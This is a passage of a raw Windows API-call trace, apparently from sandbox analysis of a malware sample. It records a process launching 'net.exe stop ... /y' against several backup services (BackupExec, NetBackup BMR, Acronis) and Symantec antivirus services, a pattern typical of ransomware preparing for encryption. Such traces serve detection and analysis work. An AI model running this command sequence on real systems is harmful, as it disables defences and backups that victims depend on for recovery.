HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f058*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x30c, hStdError=0x0), lpProcessInformation=0x24a9414 | out: lpCommandLine="\"net.exe\" stop BMR Boot Service /y", lpProcessInformation=0x24a9414*(hProcess=0x388, hThread=0x39c, dwProcessId=0xa44, dwThreadId=0xbbc)) returned 1 [0086.608] CloseHandle (hObject=0x30c) returned 1 [0086.608] GetFileType (hFile=0x2c4) returned 0x3 [0086.608] CloseHandle (hObject=0x39c) returned 1 [0086.608] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0086.608] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x39c, hWritePipe=0x560f110*=0x30c) returned 1 [0086.608] GetCurrentProcess () returned 0xffffffff [0086.608] GetCurrentProcess () returned 0xffffffff [0086.609] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x2ec) returned 1 [0086.609] CloseHandle (hObject=0x39c) returned 1 [0086.609] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0086.609] CoTaskMemAlloc (cb=0x20e) returned 0x733c48 [0086.609] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733c48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0086.609] CoTaskMemFree (pv=0x733c48) [0086.609] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop NetBackup BMR MTFTP Service /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f040*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x30c, hStdError=0x0), lpProcessInformation=0x24acce8 | out: lpCommandLine="\"net.exe\" stop NetBackup BMR MTFTP Service /y", lpProcessInformation=0x24acce8*(hProcess=0x2e0, hThread=0x39c, dwProcessId=0x808, dwThreadId=0xb80)) returned 1 [0086.842] CloseHandle (hObject=0x30c) returned 1 [0086.847] GetFileType (hFile=0x2ec) returned 0x3 [0086.847] CloseHandle (hObject=0x39c) returned 1 [0087.204] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0087.204] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x344, hWritePipe=0x560f110*=0x2fc) returned 1 [0087.205] GetCurrentProcess () returned 0xffffffff [0087.205] GetCurrentProcess () returned 0xffffffff [0087.205] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x344, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x390) returned 1 [0087.205] CloseHandle (hObject=0x344) returned 1 [0087.205] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0087.205] CoTaskMemAlloc (cb=0x20e) returned 0x73bd20 [0087.205] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x73bd20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0087.205] CoTaskMemFree (pv=0x73bd20) [0087.205] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop DefWatch /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2fc, hStdError=0x0), lpProcessInformation=0x24b0af4 | out: lpCommandLine="\"net.exe\" stop DefWatch /y", lpProcessInformation=0x24b0af4*(hProcess=0x380, hThread=0x344, dwProcessId=0x8b4, dwThreadId=0x854)) returned 1 [0087.210] CloseHandle (hObject=0x2fc) returned 1 [0087.210] GetFileType (hFile=0x390) returned 0x3 [0087.210] CloseHandle (hObject=0x344) returned 1 [0088.015] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0088.015] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x2fc, hWritePipe=0x560f110*=0x40c) returned 1 [0088.015] GetCurrentProcess () returned 0xffffffff [0088.015] GetCurrentProcess () returned 0xffffffff [0088.015] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x418) returned 1 [0088.016] CloseHandle (hObject=0x2fc) returned 1 [0088.016] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0088.016] CoTaskMemAlloc (cb=0x20e) returned 0x733bb0 [0088.016] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733bb0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0088.016] CoTaskMemFree (pv=0x733bb0) [0088.016] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop ccEvtMgr /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x40c, hStdError=0x0), lpProcessInformation=0x24b7bd4 | out: lpCommandLine="\"net.exe\" stop ccEvtMgr /y", lpProcessInformation=0x24b7bd4*(hProcess=0x414, hThread=0x2fc, dwProcessId=0xc68, dwThreadId=0xc6c)) returned 1 [0088.061] CloseHandle (hObject=0x40c) returned 1 [0088.062] GetFileType (hFile=0x418) returned 0x3 [0088.062] CloseHandle (hObject=0x2fc) returned 1 [0088.254] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0088.254] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x2fc, hWritePipe=0x560f110*=0x40c) returned 1 [0088.255] GetCurrentProcess () returned 0xffffffff [0088.255] GetCurrentProcess () returned 0xffffffff [0088.255] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x430) returned 1 [0088.255] CloseHandle (hObject=0x2fc) returned 1 [0088.255] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0088.255] CoTaskMemAlloc (cb=0x20e) returned 0x733bb0 [0088.255] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733bb0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0088.255] CoTaskMemFree (pv=0x733bb0) [0088.255] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop ccSetMgr /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x40c, hStdError=0x0), lpProcessInformation=0x24d4418 | out: lpCommandLine="\"net.exe\" stop ccSetMgr /y", lpProcessInformation=0x24d4418*(hProcess=0x42c, hThread=0x2fc, dwProcessId=0xca4, dwThreadId=0xca8)) returned 1 [0089.013] CloseHandle (hObject=0x40c) returned 1 [0089.013] GetFileType (hFile=0x430) returned 0x3 [0089.013] CloseHandle (hObject=0x2fc) returned 1 [0091.901] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0091.901] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x40c, hWritePipe=0x560f110*=0x448) returned 1 [0091.902] GetCurrentProcess () returned 0xffffffff [0091.902] GetCurrentProcess () returned 0xffffffff [0091.902] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x444) returned 1 [0091.902] CloseHandle (hObject=0x40c) returned 1 [0091.902] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0091.902] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0091.902] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0091.902] CoTaskMemFree (pv=0x741d20) [0091.902] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SavRoam /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x227a61c | out: lpCommandLine="\"net.exe\" stop SavRoam /y", lpProcessInformation=0x227a61c*(hProcess=0x394, hThread=0x40c, dwProcessId=0xd10, dwThreadId=0xd14)) returned 1 [0092.166] CloseHandle (hObject=0x448) returned 1 [0092.166] GetFileType (hFile=0x444) returned 0x3 [0092.166] CloseHandle (hObject=0x40c) returned 1 [0092.559] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0092.559] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x40c, hWritePipe=0x560f110*=0x448) returned 1 [0092.559] GetCurrentProcess () returned 0xffffffff [0092.559] GetCurrentProcess () returned 0xffffffff [0092.559] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3d4) returned 1 [0092.559] CloseHandle (hObject=0x40c) returned 1 [0092.560] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0092.560] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0092.560] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0092.560] CoTaskMemFree (pv=0x741d20) [0092.560] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop RTVscan /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x23f68cc | out: lpCommandLine="\"net.exe\" stop RTVscan /y", lpProcessInformation=0x23f68cc*(hProcess=0x2fc, hThread=0x40c, dwProcessId=0xd50, dwThreadId=0xd54)) returned 1 [0092.901] CloseHandle (hObject=0x448) returned 1 [0092.902] GetFileType (hFile=0x3d4) returned 0x3 [0092.902] CloseHandle (hObject=0x40c) returned 1 [0094.629] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0094.629] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x3c8, hWritePipe=0x560f110*=0x448) returned 1 [0094.630] GetCurrentProcess () returned 0xffffffff [0094.630] GetCurrentProcess () returned 0xffffffff [0094.630] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3ac) returned 1 [0094.630] CloseHandle (hObject=0x3c8) returned 1 [0094.630] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0094.630] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0094.630] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0094.630] CoTaskMemFree (pv=0x741d20) [0094.630] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop QBFCService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f05c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x249f998 | out: lpCommandLine="\"net.exe\" stop QBFCService /y", lpProcessInformation=0x249f998*(hProcess=0x2cc, hThread=0x3c8, dwProcessId=0xdf0, dwThreadId=0xdf4)) returned 1 [0095.165] CloseHandle (hObject=0x448) returned 1 [0095.166] GetFileType (hFile=0x3ac) returned 0x3 [0095.166] CloseHandle (hObject=0x3c8) returned 1 [0095.544] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0095.544] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x3c8, hWritePipe=0x560f110*=0x448) returned 1 [0095.544] GetCurrentProcess () returned 0xffffffff [0095.544] GetCurrentProcess () returned 0xffffffff [0095.544] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x414) returned 1 [0095.544] CloseHandle (hObject=0x3c8) returned 1 [0095.544] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0095.544] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0095.544] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0095.544] CoTaskMemFree (pv=0x741d20) [0095.544] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecAgentBrowser /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f04c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x24aa8f0 | out: lpCommandLine="\"net.exe\" stop BackupExecAgentBrowser /y", lpProcessInformation=0x24aa8f0*(hProcess=0x380, hThread=0x3c8, dwProcessId=0xe38, dwThreadId=0xe3c)) returned 1 [0095.687] CloseHandle (hObject=0x448) returned 1 [0095.687] GetFileType (hFile=0x414) returned 0x3 [0095.688] CloseHandle (hObject=0x3c8) returned 1 [0096.035] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0096.035] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x3c8, hWritePipe=0x560f110*=0x448) returned 1 [0096.035] GetCurrentProcess () returned 0xffffffff [0096.035] GetCurrentProcess () returned 0xffffffff [0096.035] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x2f4) returned 1 [0096.035] CloseHandle (hObject=0x3c8) returned 1 [0096.035] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0096.035] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0096.035] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0096.036] CoTaskMemFree (pv=0x741d20) [0096.036] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecDiveciMediaService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f040*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x24b8ea8 | out: lpCommandLine="\"net.exe\" stop BackupExecDiveciMediaService /y", lpProcessInformation=0x24b8ea8*(hProcess=0x2ec, hThread=0x3c8, dwProcessId=0xe90, dwThreadId=0xe94)) returned 1 [0096.893] CloseHandle (hObject=0x448) returned 1 [0096.894] GetFileType (hFile=0x2f4) returned 0x3 [0096.894] CloseHandle (hObject=0x3c8) returned 1 [0098.638] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0098.638] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x448, hWritePipe=0x560f110*=0x3f8) returned 1 [0098.638] GetCurrentProcess () returned 0xffffffff [0098.638] GetCurrentProcess () returned 0xffffffff [0098.638] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x3e0) returned 1 [0098.638] CloseHandle (hObject=0x448) returned 1 [0098.638] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0098.639] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0098.639] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0098.639] CoTaskMemFree (pv=0x741d20) [0098.639] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecJobEngine /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f050*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x22714b4 | out: lpCommandLine="\"net.exe\" stop BackupExecJobEngine /y", lpProcessInformation=0x22714b4*(hProcess=0x43c, hThread=0x448, dwProcessId=0xef8, dwThreadId=0xefc)) returned 1 [0099.391] CloseHandle (hObject=0x3f8) returned 1 [0099.391] GetFileType (hFile=0x3e0) returned 0x3 [0099.391] CloseHandle (hObject=0x448) returned 1 [0100.343] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0100.343] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x38c, hWritePipe=0x560f110*=0x3f8) returned 1 [0100.343] GetCurrentProcess () returned 0xffffffff [0100.343] GetCurrentProcess () returned 0xffffffff [0100.343] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x434) returned 1 [0100.343] CloseHandle (hObject=0x38c) returned 1 [0100.343] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0100.344] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0100.344] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0100.344] CoTaskMemFree (pv=0x741d20) [0100.344] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecManagementService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f040*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x247b138 | out: lpCommandLine="\"net.exe\" stop BackupExecManagementService /y", lpProcessInformation=0x247b138*(hProcess=0x448, hThread=0x38c, dwProcessId=0xf88, dwThreadId=0xf8c)) returned 1 [0100.349] CloseHandle (hObject=0x3f8) returned 1 [0100.349] GetFileType (hFile=0x434) returned 0x3 [0100.349] CloseHandle (hObject=0x38c) returned 1 [0101.136] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0101.136] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x38c, hWritePipe=0x560f110*=0x3f8) returned 1 [0101.137] GetCurrentProcess () returned 0xffffffff [0101.137] GetCurrentProcess () returned 0xffffffff [0101.137] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x460) returned 1 [0101.137] CloseHandle (hObject=0x38c) returned 1 [0101.137] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0101.137] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0101.137] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0101.137] CoTaskMemFree (pv=0x741d20) [0101.137] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecRPCService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x560f050*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3f8, hStdError=0x0), lpProcessInformation=0x2489454 | out: lpCommandLine="\"net.exe\" stop BackupExecRPCService /y", lpProcessInformation=0x2489454*(hProcess=0x45c, hThread=0x38c, dwProcessId=0xa88, dwThreadId=0x6c8)) returned 1 [0101.143] CloseHandle (hObject=0x3f8) returned 1 [0101.143] GetFileType (hFile=0x460) returned 0x3 [0101.143] CloseHandle (hObject=0x38c) returned 1 [0103.150] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0103.150] CreatePipe (in: hReadPipe=0x560f114, hWritePipe=0x560f110, lpPipeAttributes=0x560f094, nSize=0x0 | out: hReadPipe=0x560f114*=0x3f8, hWritePipe=0x560f110*=0x470) returned 1 [0103.151] GetCurrentProcess () returned 0xffffffff [0103.151] GetCurrentProcess () returned 0xffffffff [0103.151] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x560f118, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x560f118*=0x43c) returned 1 [0103.151] CloseHandle (hObject=0x3f8) returned 1 [0103.151] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0103.151] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0103.151] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0103.151] CoTaskMemFree (pv=0x741d20) [0103.151] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop AcrSch2Svc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS 